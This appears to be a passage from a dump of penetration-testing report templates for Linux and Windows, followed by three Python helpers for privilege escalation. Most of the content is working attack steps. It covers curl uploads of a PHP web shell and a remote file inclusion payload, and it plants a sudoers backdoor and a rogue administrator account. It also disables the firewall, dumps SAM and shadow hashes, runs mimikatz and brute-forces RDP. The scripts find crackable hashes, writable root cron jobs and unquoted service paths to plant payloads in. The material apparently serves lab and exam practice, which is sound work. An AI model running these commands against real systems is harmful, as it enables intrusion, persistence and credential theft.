What to try.\n\n\n### Useful commands\n\n```\n# Spawning shell\npython -c 'import pty; pty.spawn(\"/bin/sh\")'\n\n# Access to more binaries\nexport PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\n\n# Set up webserver\ncd /root/oscp/useful-tools/privesc/linux/privesc-scripts; python -m SimpleHTTPServer 8080\n\n# Download all files\nwget http://192.168.1.101:8080/ -r; mv 192.168.1.101:8080 exploits; cd exploits; rm index.html; chmod 700 LinEnum.sh linprivchecker.py unix-privesc-check\n\n./LinEnum.sh -t -k password -r LinEnum.txt\npython linprivchecker.py extended\n./unix-privesc-check standard\n\n\n# Writable directories\n/tmp\n/var/tmp\n\n\n# Add user to sudoers\necho \"hacker ALL=(ALL:ALL) ALL\" >> /etc/sudoers\n```\n\n\n### Basic info\n\n- OS:\n- Version:\n- Kernel version:\n- Architecture:\n- Current user:\n\n**Devtools:**\n- GCC:\n- NC:\n- WGET:\n\n**Users with login:**\n\n```\nuname -a\nenv\nid\ncat /proc/version\ncat /etc/issue\ncat /etc/passwd\ncat /etc/group\ncat /etc/shadow\ncat /etc/hosts\n\n# Users with login\ngrep -vE \"nologin\" /etc/passwd\n\n# Priv Enumeration Scripts\n\n\nupload /unix-privesc-check\nupload /root/Desktop/Backup/Tools/Linux_privesc_tools/linuxprivchecker.py ./\nupload /root/Desktop/Backup/Tools/Linux_privesc_tools/LinEnum.sh ./\n\npython linprivchecker.py extended\n./LinEnum.sh -t -k password\nunix-privesc-check\n```\n\n### Kernel exploits\n\n```\nsite:exploit-db.com kernel version\n\nperl /root/oscp/useful-tools/privesc/linux/Linux_Exploit_Suggester/Linux_Exploit_Suggester.pl -k 2.6\n\npython linprivchecker.py extended\n```\n\n### Programs running as root\n\nLook for webserver, mysql or anything else like that.\n\n```\n# Metasploit\nps\n\n# Linux\nps aux\n```\n\n### Installed software\n\n```\n/usr/local/\n/usr/local/src\n/usr/local/bin\n/opt/\n/home\n/var/\n/usr/src/\n\n# Debian\ndpkg -l\n\n# CentOS, OpenSuse, Fedora, RHEL\nrpm -qa (CentOS / openSUSE )\n\n# OpenBSD, FreeBSD\npkg_info\n```\n\n\n### 
Weak/reused/plaintext passwords\n\n- Check database config-file\n- Check databases\n- Check weak passwords\n\n```\nusername:username\nusername:username1\nusername:root\nusername:admin\nusername:qwerty\nusername:password\n```\n\n- Check plaintext\n\n```\n./LinEnum.sh -t -k password\n```\n\n### Inside service\n\n```\n# Linux\nnetstat -anlp\nnetstat -ano\n```\n\n### Suid misconfiguration\n\nBinary with suid permission can be run by anyone, but when they are run they are run as root!\n\nExample programs:\n\n```\nnmap\nvim\nnano\n```\n\n```\nfind / -perm -u=s -type f 2>/dev/null\n```\n\n\n### Unmounted filesystems\n\nHere we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc process over again.\n\n```\nmount -l\n```\n\n### Cronjob\n\nLook for anything that is owned by privileged user but writable for you\n\n```\ncrontab -l\nls -alh /var/spool/cron\nls -al /etc/ | grep cron\nls -al /etc/cron*\ncat /etc/cron*\ncat /etc/at.allow\ncat /etc/at.deny\ncat /etc/cron.allow\ncat /etc/cron.deny\ncat /etc/crontab\ncat /etc/anacrontab\ncat /var/spool/cron/crontabs/root\n```\n\n### SSH Keys\n\nCheck all home directories\n\n```\ncat ~/.ssh/authorized_keys\ncat ~/.ssh/identity.pub\ncat ~/.ssh/identity\ncat ~/.ssh/id_rsa.pub\ncat ~/.ssh/id_rsa\ncat ~/.ssh/id_dsa.pub\ncat ~/.ssh/id_dsa\ncat /etc/ssh/ssh_config\ncat /etc/ssh/sshd_config\ncat /etc/ssh/ssh_host_dsa_key.pub\ncat /etc/ssh/ssh_host_dsa_key\ncat /etc/ssh/ssh_host_rsa_key.pub\ncat /etc/ssh/ssh_host_rsa_key\ncat /etc/ssh/ssh_host_key.pub\ncat /etc/ssh/ssh_host_key\n```\n\n\n### Bad path configuration\n\nRequire user interaction\n\n\n\n\n\n------------------------------------------------------------------------\n\n\n\n\n----------------------------- LOOT LOOT LOOT LOOT ----------------------\n\n\n\n\n------------------------------------------------------------------------\n\n\n## Loot\n\n**Checklist**\n\n- Proof:\n- Network secret:\n- Passwords and hashes:\n- Dualhomed:\n- Tcpdump:\n- 
Interesting files:\n- Databases:\n- SSH-keys:\n- Browser:\n- Mail:\n\n\n### Proof\n\n```\n/root/proof.txt\n```\n\n### Network secret\n\n```\n/root/network-secret.txt\n```\n\n### Passwords and hashes\n\n```\ncat /etc/passwd\ncat /etc/shadow\n\nunshadow passwd shadow > unshadowed.txt\njohn --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt\n```\n\n### Dualhomed\n\n```\nifconfig\nifconfig -a\narp -a\n```\n\n### Tcpdump\n\n```\ntcpdump -i any -s0 -w capture.pcap\ntcpdump -i eth0 -w capture -n -U -s 0 src not 192.168.1.X and dst not 192.168.1.X\ntcpdump -vv -i eth0 src not 192.168.1.X and dst not 192.168.1.X\n```\n\n### Interesting files\n\n```\n#Meterpreter\nsearch -f *.txt\nsearch -f *.zip\nsearch -f *.doc\nsearch -f *.xls\nsearch -f config*\nsearch -f *.rar\nsearch -f *.docx\nsearch -f *.sql\n\n.ssh:\n.bash_history\n```\n\n### Databases\n\n### SSH-Keys\n\n### Browser\n\n### Mail\n\n```\n/var/mail\n/var/spool/mail\n```\n\n### GUI\nIf there is a gui we want to check out the browser.\n\n```\necho $DESKTOP_SESSION\necho $XDG_CURRENT_DESKTOP\necho $GDMSESSION\n```\n\n## How to replicate:\n"
  },
  {
    "path": "templates/windows-template.md",
    "content": "## Info-sheet\n\n\n- DNS-Domain name:\n- Host name:\n- OS:\n- Server:\n- Workgroup:\n- Windows domain:\n- Services and ports:\n\nINSERTTCPSCAN\n\n\n## Recon\n\n```\nAlways start with a stealthy scan to avoid closing ports.\n\n# Syn-scan\nnmap -sS INSERTIPADDRESS\n\n# Service-version, default scripts, OS:\nnmap INSERTIPADDRESS -sV -sC -O\n\n# Scan all ports, might take a while.\nnmap INSERTIPADDRESS -p-\n\n# Scan for UDP\nnmap INSERTIPADDRESS -sU\nunicornscan -mU -v -I INSERTIPADDRESS\n\n# Connect to udp if one is open\nnc -u INSERTIPADDRESS 48772\n\n# Monster scan\nnmap INSERTIPADDRESS -p- -A -T4 -sC\n```\n\n\n### Port 21 - FTP\n\n- Name:\n- Version:\n- Anonymous login:\n\nINSERTFTPTEST\n\n```\nnmap --script=ftp-anon,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 INSERTIPADDRESS\n```\n\n### Port 22 - SSH\n\n- Name:\n- Version:\n- Protocol:\n- RSA-key-fingerprint:\n- Takes-password:\nIf you have usernames test login with username:username\n\nINSERTSSHCONNECT\n\n\n### Port 25\n\n- Name:\n- Version:\n- VRFY:\n- EXPN:\n\nINSERTSMTPCONNECT\n\n```\nnc -nvv INSERTIPADDRESS 25\nHELO foo<cr><lf>\n\nnmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 INSERTIPADDRESS\n```\n\n### Port 110 - Pop3\n\n- Name:\n- Version:\n\nINSERTPOP3CONNECT\n\n### Port 135 - MSRPC\n\nSome versions are vulnerable.\n\n```\nnmap INSERTIPADDRESS --script=msrpc-enum\n```\n\nExploit:\n\n```\nmsf > use exploit/windows/dcerpc/ms03_026_dcom\n```\n\n### Port 139/445 - SMB\n\n- Name:\n- Version:\n- Domain/workgroup name:\n- Domain-sid:\n- Allows unauthenticated login:\n\n\n```\nnmap 
--script=smb-enum-shares.nse,smb-ls.nse,smb-enum-users.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-security-mode.nse,smbv2-enabled.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse INSERTIPADDRESS -p 445\n\nenum4linux -a INSERTIPADDRESS\n\nrpcclient -U \"\" INSERTIPADDRESS\n\tsrvinfo\n\tenumdomusers\n\tgetdompwinfo\n\tquerydominfo\n\tnetshareenum\n\tnetshareenumall\n\nsmbclient -L INSERTIPADDRESS\nsmbclient //INSERTIPADDRESS/tmp\nsmbclient \\\\\\\\INSERTIPADDRESS\\\\ipc$ -U john\nsmbclient //INSERTIPADDRESS/ipc$ -U john\nsmbclient //INSERTIPADDRESS/admin$ -U john\n\n# Get a shell (needs valid credentials):\nwinexe -U username //INSERTIPADDRESS \"cmd.exe\" --system\n\n```\n\n### Port 161/162 UDP - SNMP\n\n\n```\nnmap -vv -sV -sU -Pn -p 161,162 --script=snmp-netstat,snmp-processes INSERTIPADDRESS\nsnmp-check -t INSERTIPADDRESS -c public\n```\n\n```\n# Common community strings\npublic\nprivate\ncommunity\n```\n\n\n\n### Port 554 - RTSP\n\n\n### Port 1030/1032/1033/1038\n\nUsed by RPC for dynamic endpoints in a domain network. Usually nothing interesting.\n\n### Port 1433 - MSSQL\n\n- Version:\n\n```\nuse auxiliary/scanner/mssql/mssql_ping\n\n# Last resort: 
Brute force.\nuse auxiliary/scanner/mssql/mssql_login\n\n# Log in to mssql\nsqsh -S INSERTIPADDRESS -U sa\n\n# Execute commands\nxp_cmdshell 'date'\ngo\n```\n\nIf you have credentials look in metasploit for other modules.\n\n### Port 1521 - Oracle\n\n- Name:\n- Version:\n- Password protected:\n\n```\ntnscmd10g version -h INSERTIPADDRESS\ntnscmd10g status -h INSERTIPADDRESS\n```\n\n\n### Port 2100 - Oracle XML DB\n\nCan be accessed through ftp.\nSome default passwords here: https://docs.oracle.com/cd/B10501_01/win.920/a95490/username.htm\n- Name:\n- Version:\n\nDefault logins:\n\n```\nsys:sys\nscott:tiger\n```\n\n### Port 2049 - NFS\n\n```\nshowmount -e INSERTIPADDRESS\n\n# If you find anything you can mount it like this (the mount point must exist first):\nmkdir -p /tmp/NFS\nmount INSERTIPADDRESS:/ /tmp/NFS\nmount -t nfs INSERTIPADDRESS:/ /tmp/NFS\n```\n\n### Port 3306 - MySQL\n\n- Name:\n- Version:\n\n```\nmysql --host=INSERTIPADDRESS -u root -p\n\nnmap -sV -Pn -vv --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 INSERTIPADDRESS -p 3306\n```\n\n### Port 3339 - Oracle web interface\n\n- Basic info about web service (apache, nginx, IIS)\n- Server:\n- Scripting language:\n- Apache Modules:\n- IP-address:\n- Domain-name address:\n\n### Port 3389 - Remote desktop\n\nTest logging in to see what OS is running\n\n```\nrdesktop -u guest -p guest INSERTIPADDRESS -g 94%\n\n# Brute force\nncrack -vv --user Administrator -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS\n```\n\n\n### Port 80\n\n- Server:\n- Scripting language:\n- Apache Modules:\n- Domain-name address:\n\nINSERTCURLHEADER\n\n\n- Web application\n- Name:\n- Version:\n\n```\n# Nikto\nnikto -h http://INSERTIPADDRESS\n\n# Nikto with squid proxy\nnikto -h INSERTIPADDRESS -useproxy http://INSERTIPADDRESS:4444\n\n# Get header\ncurl -i INSERTIPADDRESS\n\n# Get everything\ncurl -i -L INSERTIPADDRESS\n\n# Check whether PUT is allowed (OPTIONS lists the accepted verbs), then try to upload a shell\ncurl -v -X OPTIONS 
http://INSERTIPADDRESS/\ncurl -v -X PUT -d '<?php system($_GET[\"cmd\"]); ?>' http://INSERTIPADDRESS/test/shell.php\n\n# Directory traversal fuzzing\ndotdotpwn.pl -m http -h INSERTIPADDRESS -M GET -o unix\n```\n\n\n#### Nikto scan\n\n\nINSERTNIKTOSCAN\n\n\n\n#### Url brute force\n\n\n\n```\n# Dirb\ndirb http://INSERTIPADDRESS -r -o dirb-INSERTIPADDRESS.txt\n\n# Gobuster - -s is the list of response codes to show; drop the noisy ones (403 for example)\ngobuster -u http://INSERTIPADDRESS -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e\n```\n\nINSERTDIRBSCAN\n\n\n#### Default/Weak login\n\nGoogle the documentation for default passwords and test them:\n\n```\nsite:webapplication.com password\n```\n\n```\nadmin admin\nadmin password\nadmin <blank>\nadmin nameofservice\nroot root\nroot admin\nroot password\nroot nameofservice\n<username if you have> password\n<username if you have> admin\n<username if you have> username\n<username if you have> nameofservice\n```\n\n#### LFI/RFI\n\n```\n# Kadimus\n/root/Tools/Kadimus/kadimus -u http://INSERTIPADDRESS/example.php?page=\n\n\n# Read the source instead of executing it: the php://filter wrapper returns the file base64-encoded\nhttp://INSERTIPADDRESS/index.php?page=php://filter/convert.base64-encode/resource=index\nbase64 -d savefile.php\n\n# RFI - bypass an extension the application appends (null byte or query string)\nhttp://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt%00\nhttp://INSERTIPADDRESS/page=http://192.168.1.101/maliciousfile.txt?\n```\n\n\n#### SQL-Injection\n\n```\n# Post (request saved to a file, -p names the parameter to test)\n./sqlmap.py -r search-test.txt -p tfUPass\n\n# Get\nsqlmap -u \"http://INSERTIPADDRESS/index.php?id=1\" --dbms=mysql\n\n# Crawl\nsqlmap -u http://INSERTIPADDRESS --dbms=mysql --crawl=3\n```\n\n#### Sql-login-bypass\n\n\n- Open Burp-suite\n- Make and intercept the login request\n- Send to intruder\n- Cluster bomb attack\n- Paste in sqlibypass-list (https://bobloblaw.gitbooks.io/security/content/sql-injections.html)\n- Attack\n- Check for response length variation\n\n### Password brute force - last resort\n\n```\n# Build a wordlist from the site's own pages\ncewl\n```\n\n### Port 443 - HTTPS\n\nCheck the TLS configuration and test for Heartbleed:\n\n```\nsslscan 
INSERTIPADDRESS:443\n```\n\n## Vulnerability analysis\n\nNow that we have gathered information about the system, we look for exploits, vulnerabilities and abusable features.\n\n### To try - List of possibilities\nAdd possible exploits here:\n\n\n### Find sploits - Searchsploit and google\n\nWhere there are many exploits for a piece of software, use Google. It sorts the results by popularity.\n\n```\nsite:exploit-db.com apache 2.4.7\n\n# Remove dos-exploits\n\nsearchsploit Apache 2.4.7 | grep -v '/dos/'\nsearchsploit Apache | grep -v '/dos/' | grep -vi \"tomcat\"\n\n# Only search the title (exclude the path), add the -t\nsearchsploit -t Apache | grep -v '/dos/'\n```\n\n\n\n----------------------------------------------------------------------------\n\n\n\n'''''''''''''''''''''''''''''''''' PRIVESC '''''''''''''''''''''''''''''''''\n\n\n\n-----------------------------------------------------------------------------\n\n\n## Privilege escalation\n\nNow we start the whole enumeration process over again. This is a checklist. You need to check off every single item, in this order.\n\n- Kernel exploits\n- Cleartext password\n- Reconfigure service parameters\n- Inside service\n- Program running as root\n- Installed software\n- Scheduled tasks\n- Weak passwords\n\n\n\n### To-try list\nHere you will add all possible leads. 
What to try.\n\n\n### Basic info\n\n- OS:\n- Version:\n- Architecture:\n- Current user:\n- Hotfixes:\n- Antivirus:\n\n**Users:**\n\n**Localgroups:**\n\n```\nsysteminfo\nset\nhostname\nnet users\nnet user user1\nnet localgroup\n\n# Services that Authenticated Users can reconfigure (weak service permissions)\naccesschk.exe -uwcqv \"Authenticated Users\" *\n\nnetsh firewall show state\nnetsh firewall show config\n\n# Set path\nset PATH=%PATH%;C:\\xampp\\php\n```\n\n\n### Kernel exploits\n\n\n```\n# Look for hotfixes\nsysteminfo\n\nwmic qfe get Caption,Description,HotFixID,InstalledOn\n\n# Search for exploits\nsite:exploit-db.com windows XX XX\n```\n\n\n### Cleartext passwords\n\n```\n# Windows autologin\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\"\n\n# VNC\nreg query \"HKCU\\Software\\ORL\\WinVNC3\\Password\"\n\n# SNMP Parameters\nreg query \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\SNMP\"\n\n# Putty\nreg query \"HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\"\n\n# Search for password in registry\nreg query HKLM /f password /t REG_SZ /s\nreg query HKCU /f password /t REG_SZ /s\n```\n\n\n### Reconfigure service parameters\n\n- Unquoted service paths\n\nA service whose binary path contains spaces and is not wrapped in quotes is resolved by trying each space-delimited prefix with .exe appended (C:\\Program.exe, C:\\Program Files\\Some.exe, ...) before the real binary. If you can write to one of those directories, your binary runs as the service account. Check book for instructions.\n\n- Weak service permissions\n\nCheck book for instructions\n\n### Inside service\n\nCheck netstat to see what ports are open from outside and from inside. 
Look for ports only available on the inside.\n\n```\n# Meterpreter\nrun get_local_subnets\n\nnetstat /a\nnetstat -ano\n```\n\n### Programs running as root/system\n\n\n\n### Installed software\n\n```\n# Metasploit\nps\n\ntasklist /SVC\nnet start\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\nDRIVERQUERY\n\nLook in:\nC:\\Program files\nC:\\Program files (x86)\nHome directory of the user\n```\n\n\n### Scheduled tasks\n\n```\nschtasks /query /fo LIST /v\n\nCheck this file:\nc:\\WINDOWS\\SchedLgU.Txt\n```\n\n### Weak passwords\n\nRemote desktop (needs a valid username)\n\n```\nncrack -vv --user george -P /root/oscp/passwords.txt rdp://INSERTIPADDRESS\n```\n\n### Useful commands\n\n\n**Add user and enable RDP**\n\n```\nnet user haxxor Haxxor123 /add\nnet localgroup Administrators haxxor /add\nnet localgroup \"Remote Desktop Users\" haxxor /ADD\n\n# Enable RDP\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f\n\n# Turn firewall off\nnetsh firewall set opmode disable\n\n# If you get this error:\n#\n# \"ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?\n# Failed to connect, CredSSP required by server.\"\n#\n# disable Network Level Authentication with this reg key:\n\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f\n```\n\n\n\n------------------------------------------------------------------------\n\n\n\n\n----------------------------- LOOT LOOT LOOT LOOT -------------------\n\n\n\n\n------------------------------------------------------------------------\n\n\n## Loot\n\n- Proof:\n- Network secret:\n- Password and hashes:\n- Dualhomed:\n- Tcpdump:\n- Interesting files:\n- Databases:\n- SSH-keys:\n- Browser:\n\n### Proof\n\n### Network secret\n\n### Passwords and hashes\n\n```\nwce32.exe -w\nwce64.exe 
-w\nfgdump.exe\n\nreg.exe save hklm\\sam c:\\sam_backup\nreg.exe save hklm\\security c:\\security_backup\nreg.exe save hklm\\system c:\\system\n\n# Meterpreter\nhashdump\nload mimikatz\nmsv\n```\n\n### Dualhomed\n\n```\nipconfig /all\nroute print\n\n# What other machines have been connected\narp -a\n```\n\n### Tcpdump\n\n```\n# Meterpreter\nrun packetrecorder -li\nrun packetrecorder -i 1\n```\n\n### Interesting files\n\n```\n#Meterpreter\nsearch -f *.txt\nsearch -f *.zip\nsearch -f *.doc\nsearch -f *.xls\nsearch -f config*\nsearch -f *.rar\nsearch -f *.docx\nsearch -f *.sql\n\n# How to cat files in meterpreter\ncat c:\\\\Inetpub\\\\iissamples\\\\sdk\\\\asp\\\\components\\\\adrot.txt\n\n# Recursive search\ndir /s\n```\n\n### Mail\n\n### Browser\n\n- Browser start-page:\n- Browser-history:\n- Saved passwords:\n\n### Databases\n\n### SSH-keys\n\n## How to replicate:\n"
  }
]
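The Linux template's "Users with login" check (`grep -vE nologin /etc/passwd`) and its "Passwords and hashes" loot step (`unshadow passwd shadow`, then john) are shown together in the added example below. It is not code from the repository; it does what unshadow does, but only hands john the accounts that matter: an interactive shell (the grep misses `/bin/false`) and a hash that is neither locked (`!` or `*` prefix) nor empty (empty means no password at all, so log in directly). The passwd and shadow contents are constructed sample data.

```python
"""Login-capable accounts and crackable hashes (added example, not the
template's own code). Sample passwd/shadow text is constructed."""

# Shells that do not give an interactive login. "" is also treated as none.
NOLOGIN_SHELLS = {"", "/usr/sbin/nologin", "/sbin/nologin", "/bin/false",
                  "/usr/bin/false", "/bin/sync"}
# A hash field starting with these is locked (passwd -l, usermod -L, never set).
LOCKED_PREFIXES = ("!", "*")

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/false
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/sh
svc:x:1002:1002:Service:/srv:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$salt$hash_root:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
www-data:*:18000:0:99999:7:::
alice:$6$salt$hash_alice:18000:0:99999:7:::
bob:!$6$salt$hash_bob:18000:0:99999:7:::
svc::18000:0:99999:7:::
"""


def parse_colon_file(text):
    """Map account name -> list of fields for passwd/shadow style files."""
    entries = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            fields = line.split(":")
            entries[fields[0]] = fields
    return entries


def login_users(passwd_text):
    """Accounts whose shell is interactive, in file order."""
    return [name for name, f in parse_colon_file(passwd_text).items()
            if len(f) >= 7 and f[6] not in NOLOGIN_SHELLS]


def hash_state(hash_field):
    """Classify the second shadow field."""
    if hash_field == "":
        return "no_password"
    if hash_field.startswith(LOCKED_PREFIXES):
        return "locked"
    return "crackable"


def triage(passwd_text, shadow_text):
    """Split login-capable accounts into crackable (as unshadow-format lines,
    hash in the second field, ready for john), locked and no_password."""
    passwd = parse_colon_file(passwd_text)
    shadow = parse_colon_file(shadow_text)
    out = {"crackable": [], "locked": [], "no_password": []}
    for name in login_users(passwd_text):
        if name not in shadow:
            continue  # no shadow entry: nothing to crack here
        state = hash_state(shadow[name][1])
        if state == "crackable":
            fields = list(passwd[name])
            fields[1] = shadow[name][1]
            out["crackable"].append(":".join(fields))
        else:
            out[state].append(name)
    return out


if __name__ == "__main__":
    result = triage(SAMPLE_PASSWD, SAMPLE_SHADOW)
    # Write result["crackable"] to unshadowed.txt and run:
    # john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
    for key, items in result.items():
        print(key, items)
```

On the sample data, `svc` comes out as a no-password login and `bob` as locked; only `root` and `alice` are worth john's time.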
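The Linux template's "Cronjob" step says to look for jobs owned by a privileged user but writable by you. The added example below (not code from the repository) implements that check: it parses `/etc/crontab` format (five time fields or an `@reboot`-style shortcut, then the user, then the command), works out which file cron really executes (skipping a leading interpreter such as `/bin/sh` or `python3`), and flags it when the script is world-writable, or when its directory is world-writable without the sticky bit so the script can be replaced or created. The crontab text is constructed and the script files are created in a temporary directory by `run_demo()`, so the permission checks run for real.

```python
"""World-writable root cron jobs (added example, not the template's own code).
Sample crontab and script files are constructed by run_demo()."""
import os
import shlex
import stat
import tempfile

# Interpreters whose first non-flag argument is the real script.
INTERPRETERS = {"sh", "bash", "dash", "python", "python2", "python3", "perl", "ruby"}


def parse_system_crontab(text):
    """Return [(user, argv)] for every job line; env lines and comments skipped."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:  # SHELL=..., PATH=..., MAILTO=...
            continue
        if first.startswith("@"):  # @reboot / @daily take one field
            fields = line.split(None, 2)
            user_idx = 1
        else:
            fields = line.split(None, 6)
            user_idx = 5
        if len(fields) <= user_idx + 1:
            continue
        argv = shlex.split(fields[user_idx + 1])
        if argv:
            jobs.append((fields[user_idx], argv))
    return jobs


def script_of(argv):
    """Absolute path of the file cron executes, or None for PATH lookups."""
    path = argv[0]
    if os.path.basename(path) in INTERPRETERS:
        args = [a for a in argv[1:] if not a.startswith("-")]
        if not args:
            return None
        path = args[0]
    return path if os.path.isabs(path) else None


def _mode(path):
    try:
        return os.stat(path).st_mode
    except FileNotFoundError:
        return None


def writable_jobs(crontab_text, target_user="root"):
    """Jobs of target_user whose script (or its directory) is world-writable."""
    findings = []
    for user, argv in parse_system_crontab(crontab_text):
        script = script_of(argv)
        if user != target_user or script is None:
            continue
        file_mode = _mode(script)
        dir_mode = _mode(os.path.dirname(script))
        if file_mode is not None and file_mode & stat.S_IWOTH:
            reason = "script is world-writable"
        elif dir_mode is not None and dir_mode & stat.S_IWOTH and not dir_mode & stat.S_ISVTX:
            reason = "directory is world-writable, script can be replaced or created"
        else:
            continue
        findings.append({"user": user, "script": script,
                         "name": os.path.basename(script), "reason": reason})
    return findings


def run_demo():
    """Create constructed sample scripts in a temp dir and scan a sample crontab."""
    base = tempfile.mkdtemp()
    open_dir = os.path.join(base, "open")
    os.mkdir(open_dir)
    os.chmod(open_dir, 0o777)  # world-writable, no sticky bit
    for name, mode in (("backup.sh", 0o777), ("rotate.sh", 0o755)):
        path = os.path.join(base, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho job\n")
        os.chmod(path, mode)
    crontab = f"""\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/5 * * * * root /bin/sh {base}/backup.sh
0 2 * * *   root {base}/rotate.sh --all
@reboot     root /usr/bin/python3 -u {open_dir}/missing.py
17 * * * *  alice {base}/backup.sh
"""
    return writable_jobs(crontab)


if __name__ == "__main__":
    for f in run_demo():
        print(f["user"], f["script"], "-", f["reason"])
```

On a real target, feed it `cat /etc/crontab /etc/cron.d/*` and read the script names it reports; `alice`'s job is skipped because only the target user's jobs escalate privileges.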
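The Windows template's "Reconfigure service parameters" step lists unquoted service paths and refers to the book. The added example below (not code from the repository) computes which files Windows tries to execute for a service ImagePath that contains spaces and is not quoted (every space-delimited prefix with `.exe` appended, before the real binary), then reports the candidates that land in a directory you can write to. The service entries and the writable-directory set are constructed sample data; on a real box they come from `wmic service get name,pathname` and from icacls or accesschk respectively.

```python
"""Unquoted service path check (added example, not the template's own code).
Service entries and writable directories are constructed sample data."""
import re

# Constructed sample of ImagePath values as wmic/sc would report them.
SAMPLE_SERVICES = {
    "GoodSvc": '"C:\\Program Files\\Good Vendor\\good.exe" -run',
    "BadSvc": "C:\\Program Files\\Example App\\Example Service\\svc.exe -k netsvcs",
    "SysSvc": "C:\\Windows\\system32\\svchost.exe -k LocalService",
}

# Constructed: directories where the low-privileged user has write access.
SAMPLE_WRITABLE_DIRS = {"C:\\Program Files\\Example App", "C:\\Users\\bob\\Desktop"}


def unquoted_path_candidates(image_path):
    """Executables Windows would try before the real one, in lookup order.

    A quoted path, or a path without spaces, is not vulnerable and yields [].
    Arguments after the executable ("-k netsvcs") are stripped first.
    """
    image_path = image_path.strip()
    if image_path.startswith('"'):
        return []
    # The executable ends at the first ".exe"; whatever follows is arguments.
    m = re.match(r"(?i)(.*?\.exe)(\s.*)?$", image_path)
    exe = m.group(1) if m else image_path
    parts = exe.split(" ")
    # Each prefix that ends at a space is tried as "<prefix>.exe".
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def plantable(image_path, writable_dirs):
    """Candidates whose directory is writable, i.e. where a payload named
    like the candidate would be executed as the service account."""
    writable = {d.rstrip("\\").lower() for d in writable_dirs}
    hits = []
    for cand in unquoted_path_candidates(image_path):
        parent = cand.rsplit("\\", 1)[0]
        if parent.lower() in writable:
            hits.append(cand)
    return hits


def scan(services, writable_dirs):
    """Map service name -> plantable candidates, for vulnerable services only."""
    result = {}
    for name, path in services.items():
        hits = plantable(path, writable_dirs)
        if hits:
            result[name] = hits
    return result


if __name__ == "__main__":
    for name, hits in scan(SAMPLE_SERVICES, SAMPLE_WRITABLE_DIRS).items():
        print(name, "->", hits)
```

For `BadSvc` the lookup order is `C:\Program.exe`, `C:\Program Files\Example.exe`, `C:\Program Files\Example App\Example.exe`; only the last sits in a writable directory, so that is the name to give your payload before restarting the service.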